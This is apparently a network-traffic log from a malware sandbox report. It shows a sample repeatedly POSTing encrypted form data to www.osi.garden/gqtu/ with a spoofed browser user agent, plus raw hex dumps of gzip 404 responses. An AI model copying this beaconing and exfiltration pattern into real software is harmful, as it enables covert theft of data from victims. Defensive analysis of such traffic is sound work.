                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 44 70 4b 59 67 43 35 4e 2f 6e 75 6f 76 66 44 75 38 46 48 34 6a 53 4b 6e 4d 50 72 75 78 6c 59 39 6d 36 77 33 77 74 65 66 6d 70 2f 62 65 63 45 6a 67 44 5a 68 4f 6a 57 36 7a 74 32 72 7a 4b 63 76 2f 70 7a 35 59 44 4b 4b 4e 46 59 64 6e 76 36 34 46 4c 78 77 4b 46 79 38 4f 37 69 61 77 67 6c 53 44 74 35 6d 4a 37 71 51 48 74 4c 67 49 35 51 42 43 34 45 75 4a 6b 4c 79 32 6a 48 58 6c 37 35 47 48 75 59 4d 56 59 54 44 55 53 78 59 2b 59 6b 76 67 43 6e 37 6e 78 44 31 57 2b 4d 55 64 59 76 71 78 62 68 52 2b 64 44 6f 38 34 4c 31 55 45 4c 70 6f 72 31 45 67 3d 3d
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJDpKYgC5N/nuovfDu8FH4jSKnMPruxlY9m6w3wtefmp/becEjgDZhOjW6zt2rzKcv/pz5YDKKNFYdnv64FLxwKFy8O7iawglSDt5mJ7qQHtLgI5QBC4EuJkLy2jHXl75GHuYMVYTDUSxY+YkvgCn7nxD1W+MUdYvqxbhR+dDo84L1UELpor1Eg==
                                                                                                              Nov 5, 2024 15:38:59.383042097 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:38:59 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:38:59.383099079 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:38:59.383141041 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:38:59.383183002 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
                                                                                                              Nov 5, 2024 15:38:59.383213043 CET57INData Raw: d0 35 da 27 2e 7b 76 9b 73 e3 90 f7 f1 f5 88 5c 7b ed 11 79 5e a8 1e 2f df c3 fd f8 ed bf 01 00 00 ff ff 0d 0a 41 0d 0a 03 00 71 2a ab a4 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 5'.{vs\{y^/Aq*m'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              75192.168.11.204981668.65.122.22280
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:39:01.923854113 CET737OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 6e 56 4b 5a 44 71 35 4c 66 6e 68 30 66 66 44 6e 63 46 44 34 6a 4f 4b 6e 4a 69 67 74 45 31 59 6b 44 47 77 30 31 42 65 54 47 70 2f 44 4f 63 42 74 41 44 53 68 4f 65 31 36 32 56 32 72 7a 75 63 76 2b 5a 7a 35 76 76 4c 49 64 46 61 52 48 76 34 38 46 4c 78 77 4b 46 79 38 4f 65 48 61 30 45 6c 54 7a 39 35 30 37 44 70 54 48 74 49 6e 49 35 51 46 43 35 4e 75 4a 6b 31 79 7a 44 2b 58 6d 54 35 47 48 65 59 43 67 73 51 4a 55 54 36 48 75 5a 72 72 52 54 39 38 6d 31 54 6c 78 43 35 64 50 45 41 72 6e 4b 37 4d 4d 70 6e 72 76 6b 35 78 6b 39 6a 72 71 71 75 5a 6c 52 2f 77 4d 76 41 79 35 32 4a 47 6a 46 61 71 32 30 55 38 53 51 3d
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJnVKZDq5Lfnh0ffDncFD4jOKnJigtE1YkDGw01BeTGp/DOcBtADShOe162V2rzucv+Zz5vvLIdFaRHv48FLxwKFy8OeHa0ElTz9507DpTHtInI5QFC5NuJk1yzD+XmT5GHeYCgsQJUT6HuZrrRT98m1TlxC5dPEArnK7MMpnrvk5xk9jrqquZlR/wMvAy52JGjFaq20U8SQ=
                                                                                                              Nov 5, 2024 15:39:02.104667902 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:39:02 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:39:02.104680061 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:39:02.104686975 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:39:02.104818106 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
                                                                                                              Nov 5, 2024 15:39:02.104825020 CET57INData Raw: d0 35 da 27 2e 7b 76 9b 73 e3 90 f7 f1 f5 88 5c 7b ed 11 79 5e a8 1e 2f df c3 fd f8 ed bf 01 00 00 ff ff 0d 0a 41 0d 0a 03 00 d4 cd 86 24 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 5'.{vs\{y^/A$m'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              76192.168.11.204981768.65.122.22280
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:39:04.640604973 CET1289OUTPOST /gqtu/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 7369
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.osi.garden
                                                                                                              Origin: http://www.osi.garden
                                                                                                              Referer: http://www.osi.garden/gqtu/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 53 34 2b 42 32 4b 56 42 2f 45 2b 4c 4a 6e 56 4b 5a 44 71 35 4c 66 6e 68 30 66 66 44 6e 63 46 44 34 6a 4f 4b 6e 4a 69 67 74 48 56 59 6b 57 4b 77 33 53 56 65 51 47 70 2f 64 65 63 41 74 41 44 4c 68 4f 48 38 36 32 52 4d 72 31 71 63 74 63 68 7a 2f 64 58 4c 42 64 46 61 66 58 76 35 34 46 4b 72 77 4b 31 2b 38 4f 4f 48 61 30 45 6c 54 78 31 35 6a 35 37 70 56 48 74 4c 67 49 35 63 42 43 35 6c 75 4a 39 4e 79 7a 48 78 58 57 7a 35 47 6a 36 59 4f 79 30 51 46 55 54 34 45 75 59 30 72 52 65 6a 38 6d 35 70 6c 78 65 41 64 4d 6b 41 72 44 79 6d 49 4d 6c 74 78 38 59 55 37 6c 42 67 72 5a 47 36 53 58 6f 42 2f 73 4c 50 31 39 69 38 46 68 5a 69 31 47 41 7a 74 6d 51 53 6b 70 66 75 36 57 50 4c 34 69 4e 69 77 4c 30 36 79 77 66 4c 74 59 54 78 62 7a 68 50 4b 4a 46 6a 58 39 47 61 2b 51 54 33 47 77 4b 57 68 2b 78 4b 74 4c 67 57 71 2b 4d 51 74 72 41 6a 73 7a 49 57 50 74 30 6b 74 39 56 6b 53 74 72 6b 63 6f 70 45 61 69 42 72 4c 56 68 55 69 79 69 76 4b 48 79 38 6c 71 6c 70 45 31 73 7a 6d 58 52 67 56 58 61 76 76 72 48 44 4f [TRUNCATED]
                                                                                                              Data Ascii: Q2_4=S4+B2KVB/E+LJnVKZDq5Lfnh0ffDncFD4jOKnJigtHVYkWKw3SVeQGp/decAtADLhOH862RMr1qctchz/dXLBdFafXv54FKrwK1+8OOHa0ElTx15j57pVHtLgI5cBC5luJ9NyzHxXWz5Gj6YOy0QFUT4EuY0rRej8m5plxeAdMkArDymIMltx8YU7lBgrZG6SXoB/sLP19i8FhZi1GAztmQSkpfu6WPL4iNiwL06ywfLtYTxbzhPKJFjX9Ga+QT3GwKWh+xKtLgWq+MQtrAjszIWPt0kt9VkStrkcopEaiBrLVhUiyivKHy8lqlpE1szmXRgVXavvrHDO+h6WuzXrjW7kRU4UksV659WPcc+t6zx2Qq9niQ+sIJb7JXBSWM9z/y2V6N1yunnO2Um3nDC/mmT8gkx4DhlvnsEmV/VhV+S+u1FYGHAwZDF960IUZrjoFRqGtrhKtPu3d0GV1TfJQ6xr1Cogopwd4mZFNix0oDB5ZKaaQXgfEJ81GDW1AkUNRl0J0lIm91a3S1nbbkca+BL+4AZMBkHgUWBHO6gQG2ZzKVc/ZbHZ8d+8OoVOxYrQUHj/aBXJWhRGEwO/H0rivj3EHZUhePB9zbo1zWwSQ8wfRaCtM+WGMaXGnFEXhncXhk8Y7dpktsHBAAU2rYN20JJQSeesSTKQX0K46T3N9OTt4vLyfArdvwOsqstrdSCIQDKBwE9wDQ91/PMS+RZoboT4QPg/vgXpEw+scer/M6FVF77tn7FxKr/OZ3HWwM
                                                                                                              Nov 5, 2024 15:39:04.640657902 CET5156OUTData Raw: 73 31 67 63 30 65 58 79 57 67 69 51 52 53 6d 73 79 6a 31 50 51 47 52 55 45 59 58 4d 4b 33 50 77 47 4a 67 43 73 59 7a 69 6b 4e 2f 67 30 73 67 72 41 56 4c 41 78 54 79 53 42 59 51 31 76 61 6e 2f 43 6b 36 61 75 53 48 4b 6a 57 52 54 71 56 7a 45 50 78
                                                                                                              Data Ascii: s1gc0eXyWgiQRSmsyj1PQGRUEYXMK3PwGJgCsYzikN/g0sgrAVLAxTySBYQ1van/Ck6auSHKjWRTqVzEPx6dYaS9r/7jylOJCAoFQvULkN6GVcoLKv8WmfMSQvyWmgn0c9etI+4+p1NqEPQioG1meMod9iq0KHgmhnKFjTo+sbSivYf66tnDrfZeUefMbJLCNFZA/9HUf5Y3d8uRyTmzUlJ2oYuMF3dnN7tLcXDCadDo5ahD2K9
                                                                                                              Nov 5, 2024 15:39:04.640702009 CET1441OUTData Raw: 6f 6d 4c 59 31 69 38 4c 5a 36 6d 4b 55 6a 41 56 39 43 33 42 55 57 49 44 6c 34 54 64 43 64 2b 49 6c 44 4b 50 48 32 33 57 51 55 53 50 32 42 38 2f 32 6b 69 44 6e 36 6f 6f 47 6c 46 6d 2f 36 69 56 47 57 4f 2b 7a 78 49 66 4a 71 2b 4c 67 78 4a 56 71 44
                                                                                                              Data Ascii: omLY1i8LZ6mKUjAV9C3BUWIDl4TdCd+IlDKPH23WQUSP2B8/2kiDn6ooGlFm/6iVGWO+zxIfJq+LgxJVqDJEvZHuRk/mFzd6esj4JBqIPIqOxYwZ6YcHmQ1aiZLamtOg01Y1K/ob+debnKRntdhLNs26mmT5wSLtfS0tSCQ1ARtUtTDkYXok79UkYL4U2MJcS6h5YHTpm2E0aVQDYUEKglA+2OUm4FSmro49+EAAXYNJ9XZjhYP
                                                                                                              Nov 5, 2024 15:39:04.830723047 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              content-encoding: gzip
                                                                                                              vary: Accept-Encoding
                                                                                                              date: Tue, 05 Nov 2024 14:39:04 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 31 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 12 78 db 93 00 42 80 24 10 20 81 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef 26 4b 7e 6d 6b 02 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f3 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b fa ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 b5 d2 09 52 e7 7f 32 43 e8 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 6a 5e 43 d3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2d 23 27 f9 06 49 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f [TRUNCATED]
                                                                                                              Data Ascii: 1339Zrz_OAJw1xB$ RU85d)d{,T.7w~&K~mkiAco)(}Y}_poOw5kdNY{K0+,wR2Cz@We}5:|@r<aBQ$JBj^CGU}J4\nU1z{'/CyVN%-#'I iA7re*:#=12p(N45Hy?jqP:y~+8EYND)~:o5(oEU8hnN},}r:\>[#MwC=TEU>FWjzU;uSn&_.Sqz_JM~(7_E/SyXI>3UNe7A\q`IWhWZJ|jV70?#GC*E[*3v8uMWxkp5gjq9_yW^?wkQ{9BdFo^uufl(Oj^UeY>PU#_)?M&F,?*{O;Ido77yq,U}:*eLv9Q7MZ~AN]NSZUlA9W$|-?]>'z:FF7/|7?v/8]VR>t&$F/)"Keh<7ln< q [TRUNCATED]
                                                                                                              Nov 5, 2024 15:39:04.830780983 CET1289INData Raw: 0f 50 18 79 1e c8 3e 8e b8 5a 9f 2e 91 fd 9c d7 ef c7 bd 99 73 c0 bc 15 ed d3 55 64 18 f8 33 2b 3e 56 f9 1b c4 4b 25 fd 64 53 34 a0 bc 84 2f 73 bb 2f b8 81 f8 f3 59 7e 05 fa 3e d3 07 c2 d0 ae a3 f6 63 c6 fd 79 be 0f 7e 54 56 f5 bd 1b 46 89 f7 99
                                                                                                              Data Ascii: Py>Z.sUd3+>VK%dS4/s/Y~>cy~TVF/0{]s HnzB}Y/@_y,0k"1Rlc#Wy$fj!fu{U%f>L1-0f*gP?)>_<v.e)o{#[dqKCb
                                                                                                              Nov 5, 2024 15:39:04.830822945 CET1289INData Raw: 50 02 2f ea 62 11 8c d6 d9 e1 9c 6e b8 bd 39 ae 85 3e 0e ad 8e 18 9d ce 84 c4 a7 e8 51 68 85 1d c3 8f db 89 bd 03 1b 56 0f b3 79 ac 9b 22 12 8d d5 49 c6 2f 90 b0 db b7 b3 72 94 46 da 5c 5a 3b 4b 81 22 fb 82 13 cb 84 36 e4 ed 7c 8b ed 63 02 66 31
                                                                                                              Data Ascii: P/bn9>QhVy"I/rF\Z;K"6|cf1QIB4S*-t"P=:$Y=]eL/H8hXcn7L0qNPXZ;Jn9`q,%neaWP.]>g_l7&wZAC/Hk-EPm-
                                                                                                              Nov 5, 2024 15:39:04.830864906 CET1289INData Raw: 57 61 6c 80 b9 47 b4 a3 71 a6 31 ae 3a 99 49 6d 3e 81 e1 de 6b 8b bc dd ce f9 82 5a f9 b9 d8 4b d5 01 3d 4d 61 b9 93 cc a6 1a 57 a9 15 d2 b2 64 89 72 37 ab 17 a7 71 a3 8e 34 80 74 6c 56 72 fd 32 63 9d 93 bc 5a 6c 62 9d ee 72 6e 7e 32 60 d8 33 d7
                                                                                                              Data Ascii: WalGq1:Im>kZK=MaWdr7q4tlVr2cZlbrn~2`3U#]Ea/k}4FeN}N@YNJmLVSVt\nDOg>wNd9-zfx65D"rWg`"HEfSEd,h[X{/6C]s:{&nmLxlZN8d^d0Zl
                                                                                                              Nov 5, 2024 15:39:04.830893993 CET57INData Raw: d0 35 da 27 2e 7b 76 9b 73 e3 90 f7 f1 f5 88 5c 7b ed 11 79 5e a8 1e 2f df c3 fd f8 ed bf 01 00 00 ff ff 0d 0a 41 0d 0a 03 00 ef 54 4b 09 6d 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 5'.{vs\{y^/ATKm'0


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              77192.168.11.204981868.65.122.22280
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:39:07.355928898 CET454OUTGET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.osi.garden
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:39:07.534816980 CET1289INHTTP/1.1 404 Not Found
                                                                                                              keep-alive: timeout=5, max=100
                                                                                                              content-type: text/html
                                                                                                              transfer-encoding: chunked
                                                                                                              date: Tue, 05 Nov 2024 14:39:07 GMT
                                                                                                              server: LiteSpeed
                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                              connection: close
                                                                                                              Data Raw: 32 37 36 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                              Data Ascii: 276D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
